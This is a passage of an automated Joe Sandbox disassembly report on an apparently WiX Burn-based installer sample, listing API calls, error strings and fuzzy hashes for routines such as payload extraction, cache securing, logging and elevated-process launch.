                                                            • WaitForSingleObject.KERNEL32(008BB488,000000FF,?,0087C1D3,?,008753BD,00000000,?,0088784D,?,0087566D,00875479,00875479,00000000,?,00875489), ref: 0089165F
                                                            • GetLastError.KERNEL32(?,0087C1D3,?,008753BD,00000000,?,0088784D,?,0087566D,00875479,00875479,00000000,?,00875489,FFF9E89D,00875489), ref: 00891669
                                                            • CloseHandle.KERNEL32(00000000,00875489,?,00000000,?,0087C1D3,?,008753BD,00000000,?,0088784D,?,0087566D,00875479,00875479,00000000), ref: 008916B4
                                                            • CloseHandle.KERNEL32(00000000,00875489,?,00000000,?,0087C1D3,?,008753BD,00000000,?,0088784D,?,0087566D,00875479,00875479,00000000), ref: 008916C3
                                                            • CloseHandle.KERNEL32(00000000,00875489,?,00000000,?,0087C1D3,?,008753BD,00000000,?,0088784D,?,0087566D,00875479,00875479,00000000), ref: 008916D2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$ErrorLast$EventObjectSingleWait
                                                            • String ID: Failed to set begin operation event.$Failed to wait for thread to terminate.$cabextract.cpp
                                                            • API String ID: 1206859064-226982402
                                                            • Opcode ID: 5b46c5d41b16c9802c3b7c5cfb317099bf261fb4b582188c9958e0d4254fe432
                                                            • Instruction ID: 21222efec9bb995ddb52a429c5cb70bb399d041f79d4e9051931576412b86732
                                                            • Opcode Fuzzy Hash: 5b46c5d41b16c9802c3b7c5cfb317099bf261fb4b582188c9958e0d4254fe432
                                                            • Instruction Fuzzy Hash: F821F632944A23BBCF226B55CC0DB56B7B0FF14725F1D4225E918E1A90D774EC50CADA
                                                            APIs
                                                              • Part of subcall function 008B0523: EnterCriticalSection.KERNEL32(008DB5FC,00000000,?,?,?,00884207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008754FA,?), ref: 008B0533
                                                              • Part of subcall function 008B0523: LeaveCriticalSection.KERNEL32(008DB5FC,?,?,008DB5F4,?,00884207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008754FA,?), ref: 008B067A
                                                            • OpenEventLogW.ADVAPI32(00000000,Application), ref: 00884212
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0088421E
                                                            • ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,008C39D4,00000000), ref: 0088426B
                                                            • CloseEventLog.ADVAPI32(00000000), ref: 00884272
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
                                                            • String ID: Application$Failed to open Application event log$Setup$_Failed$logging.cpp$txt
                                                            • API String ID: 1844635321-1389066741
                                                            • Opcode ID: 99f080a469b33093ee0a152872b3f5ac22fdf7119da4727f77e9db2bce1878ad
                                                            • Instruction ID: dc433f6670628ab9994dd528b1e19a10969bbdfa91cb7e75472f6c6d589b8904
                                                            • Opcode Fuzzy Hash: 99f080a469b33093ee0a152872b3f5ac22fdf7119da4727f77e9db2bce1878ad
                                                            • Instruction Fuzzy Hash: E1F08133A85A727A963136A61C0AE7F5D7CFA82F317024118BD20F5281DBA8CD0386F5
                                                            APIs
                                                            • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 0088949E
                                                            • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,000007D0,00000001), ref: 008894C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID: $$0$Could not close verify handle.$Could not verify file %ls.$Failed to allocate memory$Failed to allocate string.$Failed to encode file hash.$Failed to get file hash.$cache.cpp
                                                            • API String ID: 1452528299-4263581490
                                                            • Opcode ID: 78b874c25efca41ef55815e62fdccfc74ff46ccad488e96ecc39c2356e868199
                                                            • Instruction ID: 59d45c3c7b357c7388b211fa32a39d8a98e033ad83fbdebc502b72509ad8d231
                                                            • Opcode Fuzzy Hash: 78b874c25efca41ef55815e62fdccfc74ff46ccad488e96ecc39c2356e868199
                                                            • Instruction Fuzzy Hash: 51716072D00229ABDB11EFD8C841FEEB7B8FB18720F154129E955FB281E7349D418BA1
                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0088E577
                                                            • DefWindowProcW.USER32(?,00000082,?,?), ref: 0088E5B5
                                                            • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0088E5C2
                                                            • SetWindowLongW.USER32(?,000000EB,?), ref: 0088E5D1
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 0088E5DF
                                                            • CreateCompatibleDC.GDI32(?), ref: 0088E5EB
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0088E5FC
                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0088E61E
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0088E626
                                                            • DeleteDC.GDI32(00000000), ref: 0088E629
                                                            • PostQuitMessage.USER32(00000000), ref: 0088E637
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$ObjectProcSelect$CompatibleCreateDeleteMessagePostQuitStretch
                                                            • String ID:
                                                            • API String ID: 409979828-0
                                                            • Opcode ID: e807211f8e33164f1c75097dbd3733dce922e25dfec0c96a6dafa7dfae8aa16c
                                                            • Instruction ID: ea098a37985cdd3b10c059f0b9edf7b14e206211d217dfa89cdd4f40b41d65e7
                                                            • Opcode Fuzzy Hash: e807211f8e33164f1c75097dbd3733dce922e25dfec0c96a6dafa7dfae8aa16c
                                                            • Instruction Fuzzy Hash: 67218932104208BFDB25AF68DC0CD7B3FA8FF59764B054618FA16D62B0E7B18810DB60
                                                            Strings
                                                            • WixBundleOriginalSource, xrefs: 0088A1B7
                                                            • Failed to copy source path., xrefs: 0088A31A
                                                            • WixBundleLayoutDirectory, xrefs: 0088A26C
                                                            • Failed to combine layout source with source., xrefs: 0088A2A4
                                                            • Failed to combine last source with source., xrefs: 0088A210
                                                            • WixBundleLastUsedSource, xrefs: 0088A1A1
                                                            • Failed to get current process directory., xrefs: 0088A1F3
                                                            • Failed to get bundle layout directory property., xrefs: 0088A287
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirstlstrlen
                                                            • String ID: Failed to combine last source with source.$Failed to combine layout source with source.$Failed to copy source path.$Failed to get bundle layout directory property.$Failed to get current process directory.$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleOriginalSource
                                                            • API String ID: 2767606509-3003062821
                                                            • Opcode ID: 06e7716d97d5e47db1014daeda4c3503f6e9d3e61093636efba0a90a7d2a3f3a
                                                            • Instruction ID: e72b64dd06acfb09da2ef805ab416ce2351bcc8666abdacc25f73f6dffd900d3
                                                            • Opcode Fuzzy Hash: 06e7716d97d5e47db1014daeda4c3503f6e9d3e61093636efba0a90a7d2a3f3a
                                                            • Instruction Fuzzy Hash: 69714E71D01119ABEF29EFA8D841AEEB7B9FF08310F54012AE911F7290E7759D418B62
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 00872E5F
                                                            • GetLastError.KERNEL32 ref: 00872E69
                                                            • GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00872F09
                                                            • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00872F96
                                                            • GetLastError.KERNEL32 ref: 00872FA3
                                                            • Sleep.KERNEL32(00000064), ref: 00872FB7
                                                            • CloseHandle.KERNEL32(?), ref: 0087301F
                                                            Strings
                                                            • %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00872F66
                                                            • pathutil.cpp, xrefs: 00872E8D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
                                                            • String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
                                                            • API String ID: 3480017824-1101990113
                                                            • Opcode ID: a712173aa389992681320d2ad543b1d8fddd5ea398da5ca23b458060cdb8bf5a
                                                            • Instruction ID: de51ed696f3f6f1bc865137f43f0475e010ab0345a64935aa0f02e85d0b39842
                                                            • Opcode Fuzzy Hash: a712173aa389992681320d2ad543b1d8fddd5ea398da5ca23b458060cdb8bf5a
                                                            • Instruction Fuzzy Hash: 7A718372D41129ABDB309F989C49BAEB3B8FB08710F0042A5F908F7295D774DE809F61
                                                            APIs
                                                            • CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,008753BD,00000000,00875489,00875445,WixBundleUILevel,840F01E8,?,00000001), ref: 0087CC1C
                                                            Strings
                                                            • Failed to extract file., xrefs: 0087CCE7
                                                            • Payload was not found in container: %ls, xrefs: 0087CD29
                                                            • Failed to concat file paths., xrefs: 0087CCFC
                                                            • Failed to get directory portion of local file path, xrefs: 0087CCF5
                                                            • Failed to ensure directory exists, xrefs: 0087CCEE
                                                            • Failed to get next stream., xrefs: 0087CD03
                                                            • Failed to find embedded payload: %ls, xrefs: 0087CC48
                                                            • payload.cpp, xrefs: 0087CD1D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareString
                                                            • String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
                                                            • API String ID: 1825529933-1711239286
                                                            • Opcode ID: 97c61b2cbcb4c9fc898b1c16c471cb7e1ad390ca6e9498a0255e828e04e7ad4f
                                                            • Instruction ID: 6f4b1b1d6e591b93a1100d6f4e7cacb04b11dacb79416347c7f51ec3d938d11d
                                                            • Opcode Fuzzy Hash: 97c61b2cbcb4c9fc898b1c16c471cb7e1ad390ca6e9498a0255e828e04e7ad4f
                                                            • Instruction Fuzzy Hash: 21419A31941219EBCB269E48CC819AEBBA5FF40710B11C16DE91DEB36AD770DE80DB91
                                                            APIs
                                                            • PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 008747BB
                                                            • GetCurrentThreadId.KERNEL32 ref: 008747C1
                                                            • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0087484F
                                                            Strings
                                                            • wininet.dll, xrefs: 008747EE
                                                            • Failed to create engine for UX., xrefs: 008747DB
                                                            • engine.cpp, xrefs: 0087489B
                                                            • Unexpected return value from message pump., xrefs: 008748A5
                                                            • Failed to load UX., xrefs: 00874804
                                                            • Failed to start bootstrapper application., xrefs: 0087481D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Message$CurrentPeekThread
                                                            • String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
                                                            • API String ID: 673430819-2573580774
                                                            • Opcode ID: bfb1050b7b5aeb8efb8b14d12398f667cac3d388449f8da2ba6709a9213289de
                                                            • Instruction ID: d492ea507fe355cc3fb9ecf67f28c1c38afdc5694d67c72e18e24d27b0de40d5
                                                            • Opcode Fuzzy Hash: bfb1050b7b5aeb8efb8b14d12398f667cac3d388449f8da2ba6709a9213289de
                                                            • Instruction Fuzzy Hash: 6B41C171A00659BFDB109BA4CC85EBAB7ACFF08314F108235F918E7254DB70ED0587A2
                                                            APIs
                                                            • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,0089B03E,?,00000001,00000000), ref: 00899D0F
                                                            • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,0089B03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 00899D19
                                                            • CopyFileExW.KERNEL32(00000000,00000000,00899B69,?,?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00899D67
                                                            • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,0089B03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 00899D96
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLast$AttributesCopy
                                                            • String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$copy
                                                            • API String ID: 1969131206-836986073
                                                            • Opcode ID: b32e63e58ecfb1b618468195f1754d983d5d2be08ed796cc19e3814c2dd780f6
                                                            • Instruction ID: f110309285b2f5ab4da9ea5390e992c0163e7d576ff1b96b9c7e3a7504d7f1dc
                                                            • Opcode Fuzzy Hash: b32e63e58ecfb1b618468195f1754d983d5d2be08ed796cc19e3814c2dd780f6
                                                            • Instruction Fuzzy Hash: 5C31D872A41115A7DF20AA5A8C85E6B776CFF41B25B18812DFD58EB341D774CD00C6E1
                                                            APIs
                                                            • LocalFree.KERNEL32(00000000,?,00000001,80000005,?,00000000,00000000,00000000,00000003,000007D0), ref: 00889007
                                                            Strings
                                                            • cache.cpp, xrefs: 00888FB0
                                                            • Failed to allocate access for SYSTEM group to path: %ls, xrefs: 00888F30
                                                            • Failed to create ACL to secure cache path: %ls, xrefs: 00888FBB
                                                            • Failed to secure cache path: %ls, xrefs: 00888FEA
                                                            • Failed to allocate access for Administrators group to path: %ls, xrefs: 00888F0F
                                                            • Failed to allocate access for Everyone group to path: %ls, xrefs: 00888F51
                                                            • Failed to allocate access for Users group to path: %ls, xrefs: 00888F72
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FreeLocal
                                                            • String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$cache.cpp
                                                            • API String ID: 2826327444-4113288589
                                                            • Opcode ID: 9359ad37348da558a2633ebda8ca09908667db72b126fb5536239459b7e71da8
                                                            • Instruction ID: 14167f277aa86cff20ab50db970c698f0d14d2661fc29b8c9a27fa149716f269
                                                            • Opcode Fuzzy Hash: 9359ad37348da558a2633ebda8ca09908667db72b126fb5536239459b7e71da8
                                                            • Instruction Fuzzy Hash: B641E432E4072AF7DB21B6548C02FAA7679FB50B10F914164FB04FA281DFB19E449BA1
                                                            APIs
                                                            • ReadFile.KERNEL32(00000000,crypt32.dll,00000008,?,00000000,?,00000000,00000000,crypt32.dll,00000000,?,?,?,00000000,?,00000000), ref: 0088495A
                                                            • GetLastError.KERNEL32 ref: 00884967
                                                            • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 00884A12
                                                            • GetLastError.KERNEL32 ref: 00884A1C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastRead
                                                            • String ID: Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$crypt32.dll$pipe.cpp
                                                            • API String ID: 1948546556-773887359
                                                            • Opcode ID: c09c69f032149c10e0380bc8888e097ea467aefb5dc2a5ed5f9f92f9ccc73326
                                                            • Instruction ID: 4223b4ad716bbf7dc0919c2d09b2eddcdb9baf2bb3e8a9cca7ebbbe39fe14db3
                                                            • Opcode Fuzzy Hash: c09c69f032149c10e0380bc8888e097ea467aefb5dc2a5ed5f9f92f9ccc73326
                                                            • Instruction Fuzzy Hash: 0A31E433D8023BABDB20AA958C46BABBB68FB04721F119129FC54EA250D774DD4087D1
                                                            APIs
                                                            • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,name,000000FF,00000000,00000000,00000000,?,74DEDFD0), ref: 008B6C88
                                                            • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,email,000000FF), ref: 008B6CA5
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B6CE3
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B6D27
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$CompareFree
                                                            • String ID: `<u$email$name$uri
                                                            • API String ID: 3589242889-1197142144
                                                            • Opcode ID: 65015468c7ff42a0740c079a046299e03f084062dc270b6c8ece27f9e44e9b84
                                                            • Instruction ID: d50bac253cc02c63a9d1c293c33626b5a447f91331c6da29a5f76f13d0d3b0cd
                                                            • Opcode Fuzzy Hash: 65015468c7ff42a0740c079a046299e03f084062dc270b6c8ece27f9e44e9b84
                                                            • Instruction Fuzzy Hash: 34416D31A01219BBCB119B94CD54FEEBB74FF04721F2442A4E920EA3A0D7799E24DB90
                                                            APIs
                                                            • LoadBitmapW.USER32(?,00000001), ref: 0088E2E5
                                                            • GetLastError.KERNEL32 ref: 0088E2F1
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0088E338
                                                            • GetCursorPos.USER32(?), ref: 0088E359
                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 0088E36B
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 0088E381
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Monitor$BitmapCursorErrorFromInfoLastLoadObjectPoint
                                                            • String ID: ($Failed to load splash screen bitmap.$splashscreen.cpp
                                                            • API String ID: 2342928100-598475503
                                                            • Opcode ID: f5d910c912e1da05f5c51bc10a4fb393cfcc12a3b649c96c10730c9b9d18a05d
                                                            • Instruction ID: 4c61483ab74641e46064a216d829071e5bdd3ce12d6be82c41082571b2be41c6
                                                            • Opcode Fuzzy Hash: f5d910c912e1da05f5c51bc10a4fb393cfcc12a3b649c96c10730c9b9d18a05d
                                                            • Instruction Fuzzy Hash: 81312175A00619AFDB10DFA8DD49A9EBBF4FF08710F148129F905EB385DB70E9048BA1
                                                            APIs
                                                            • GetCurrentProcessId.KERNEL32(?,00000000,?,?,008BB500), ref: 008850D3
                                                            • GetProcessId.KERNEL32(000000FF,?,?,open,00000000,00000000,?,000000FF,?,?), ref: 00885171
                                                            • CloseHandle.KERNEL32(00000000), ref: 0088518A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCurrentHandle
                                                            • String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
                                                            • API String ID: 2815245435-1352204306
                                                            • Opcode ID: 5debac5ba63a31b005ef2beb38636ab5bc55c30080ba1bf6b88eedce82dd5834
                                                            • Instruction ID: 71caa50be7d54adf4b4c9a28d5bd5dd114ec7c6730d988143e8c7d775de9cee5
                                                            • Opcode Fuzzy Hash: 5debac5ba63a31b005ef2beb38636ab5bc55c30080ba1bf6b88eedce82dd5834
                                                            • Instruction Fuzzy Hash: E0216679D4160DFFCF11AF98CC85AAEBBB8FF04350B50816AF815E2210D7319E509B91
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 008768AC
                                                            • GetProcAddress.KERNEL32(00000000), ref: 008768B3
                                                            • GetLastError.KERNEL32 ref: 008768BD
                                                            Strings
                                                            • variable.cpp, xrefs: 008768E1
                                                            • DllGetVersion, xrefs: 0087689E
                                                            • Failed to set variant value., xrefs: 00876929
                                                            • msi, xrefs: 008768A3
                                                            • Failed to find DllGetVersion entry point in msi.dll., xrefs: 008768EB
                                                            • Failed to get msi.dll version info., xrefs: 00876905
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressErrorHandleLastModuleProc
                                                            • String ID: DllGetVersion$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$msi$variable.cpp
                                                            • API String ID: 4275029093-842451892
                                                            • Opcode ID: e3dc8159bd91da87408352ff09aee8f6c3bbb3d49c67cf7b4af026e146540897
                                                            • Instruction ID: 670793b2e1c981453a6a4a00e20b8de9ac818d7c547ac051bf038750b26d516d
                                                            • Opcode Fuzzy Hash: e3dc8159bd91da87408352ff09aee8f6c3bbb3d49c67cf7b4af026e146540897
